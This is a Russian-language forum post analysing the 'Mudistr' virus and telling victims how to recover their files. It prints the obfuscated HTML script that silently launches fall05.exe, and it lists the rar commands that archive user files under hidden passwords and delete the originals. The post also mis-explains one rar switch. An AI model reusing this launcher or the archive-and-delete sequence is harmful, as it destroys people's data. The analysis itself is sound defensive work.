!!!!ЧИТАТЬ ВСЕМ Про вирус мудистра и как исбвляться от него

1 открывается фаил index.html
цитата:

Hello!
<script language="javascript"> document.write('<OBJECT NAME="X' + '" CLASS' + 'ID="CLSI' + 'D:11111' + '111-111' + '1-1111' + '-1111-11' + '111111' + '1123" CODE' + 'BASE=' + '"fall' + '05.exe" wid' + 'th=1 heigh' + 't=1>');
</script>

Ты видишь в окне просмотра только Hello! , а ещё запускается фаил fall05.exe
2 fall05.exe = это самораспаковывающийся архив
содержит фаилы :
1.bat - 5.bat - скрипты
rar.exe - консольный рар
lsas.exe - первый раз в жизни соглашусь с qnx :) , lsas.exe это не вирус , он запускает rar.exe
сначала запускаются фаилы от 1.bat до 5.bat , они не скидывают все фаилы в один, как полагалось некоторыми авторитетами , которые не знают ни команд dos ни могут посмотреть dir -? , оттуда бы они узнали что с помошью ключей /s /b /a просто скидывают списки фаилов в один.

1.bat в mtxoc32.ini - фаилы с расширениями doc , xls , rtf , mdb , xml , nfo , txt.
2.bat в mtml32.ini - htm , html , css , php , php , cgi.
3.bat в emsxpm32.ini - mp3.
4.bat в ottor32.ini - jpg , pdf , lnk.
5.bat в nvxow32.ini - psd.

после этого запускается lsas , он запускает rar.exe с параметрами :
a

stertd.rar
-df
-ep2
-hp3,78355186944842E+18
-p3,78355186944842E+18
-tl
-y
-inul
-idp
@mtxoc32.ini
a
abery2.rar
-df
-ep2
-hp-3,03506065330114E+32
-p-3,03506065330114E+32
-tl
-y
-inul
-idp
@mtml32.ini
a
vuentu.rar
-df
-ep2
-hp2,21739596759373E+34
-p2,21739596759373E+34
-tl
-y
-inul
-idp
@emsxpm32.ini
a
menait.rar
-df
-ep2
-hp-2,21739596759373E+34
-p-2,21739596759373E+34
-tl
-y
-inul
-idp
@ottor32.ini
a
mech4e.rar
-df
-ep2
-hp1,62031886613828E+36
-p1,62031886613828E+36
-tl
-y
-inul
-idp
@nvxow32.ini


-df (фаилы после архивации удаляются) -ep2(сохрянять пути) -hp (зашифровать) -p(print file to stdout) -tl(поставиить время архива как последнего фаила) -y (да на все вопроссы) -inul (отключить сообщения) -idp (отключить отображение процентов)

Пострадавшим : наити фаилы
stertd.rar , abery2.rar , vuentu.rar , menait.rar , mech4e.rar и попробовать пароли которые здесь
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\zipasswd
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\rapasswd
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\acpasswd

Мудистр твоя прожка вызвала только смех и сочувствие


пароль чтобы остановить счетчик : $23#7L@:8$g%f27N8)4g*f78T^vg4_f=v7+D6v&32(vDf$65QvfC[7bv7645b+f76;v76

Я искрене надеюсь что fin и другие участники конференции изменят своё отношение ко мне

Комменты сюда http://forums.overclockers.ru/viewtopic.php?t=106841
или в лс http://forums.overclockers.ru/privmsg.php?mode=post&u=36255
или на мыло igor_19_19@mail.ru
Telegram-канал @overclockers_news - это удобный способ следить за новыми материалами на сайте. С картинками, расширенными описаниями и без рекламы.
Оценитe материал

Возможно вас заинтересует

Популярные новости

Сейчас обсуждают